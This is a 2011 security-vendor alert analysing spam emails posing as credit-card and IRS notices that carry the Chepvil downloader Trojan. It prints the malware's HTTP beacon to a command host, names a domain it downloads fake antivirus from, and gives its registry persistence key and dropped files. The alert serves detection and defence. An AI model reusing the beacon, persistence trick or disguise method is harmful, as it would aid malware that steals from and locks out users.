Fake Credit Card and IRS notices

June 30, 2011

SonicWALL UTM Research team observed two new spam campaigns in the past few days pretending to contain notices from a Credit Card company or the Internal Revenue Service (IRS). The e-mails contain Downloader Trojan Chepvil as attachment. Chepvil is a Trojan that silently downloads and installs malware components or other malware which includes Rouge AV. SonicWALL has received more than 100,000 copies of emails from these spam campaigns till now delivering 74 unique malicious binaries and it is still active at the time of writing this article.

Campaign #1 - Credit Card Overdue notice spam

Subject:

  • Credit Card Overdue

Attachment: Customer details.zip (contains Customer details.exe)

The e-mail message looks like below:

screenshot

Campaign #2 - IRS notification spam

Subject:

  • IRS notification

Attachment: IRS document.zip (contains IRS document.exe)

The e-mail message looks like below:

screenshot

The executable file inside the zip attachment has an icon disguised as a Acrobat Reader PDF file:

screenshot

If the user downloads and executes the malicious executable inside the zip attachment, it performs the following activity:

  • Creates a process SVCHOST.EXE and injects code into it.

  • Deletes the original copy of the file.

  • Reports the infected machine by sending the following GET request:
    GET /404.php?type=stats&affid=531&subid=01&awok HTTP/1.1
    User-Agent: IE
    Host: click(REMOVED).org

  • Downloads Fake AV Trojan from a remote server mysteryforyou1.ru to the following location and executes it:

    • (Application Data)dRBAHQLTbF.exe - [ detected as GAV: FakeAV.PSL (Trojan) ]

  • Fake AV Trojan moves all the user programs into (TEMP)smtmp(N) [where N = 1,2,3..] periodically making them unavailable to the user and also hides the user files. Commands and features found in the analysis are shown below:

    screenshot

    Languages supported:

    screenshot

    More details about this Fake AV Trojan functionality can be found in one of our previous sonicalerts - Fake Desktop Utilities on the rise (June 8, 2011)

  • Other dropped files include:
    • (TEMP)trol.exe - [ detected as GAV: Agent.SEO (Trojan) ]
    • (TEMP)javaw.exe - [ detected as GAV: Suspicious#polycrypt.4_2 (Worm) ]

  • Registry modification to ensure Fake AV runs upon system reboot:
    • Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionRun
      Value: dRBAHQLTbF
      Data:(Application Data)dRBAHQLTbF.exe

    • SonicWALL Gateway AntiVirus blocks the spammed Downloader Trojan Chepvil proactively via following signature:

    • GAV: Suspicious#Chepvil.K (Trojan)

    screenshot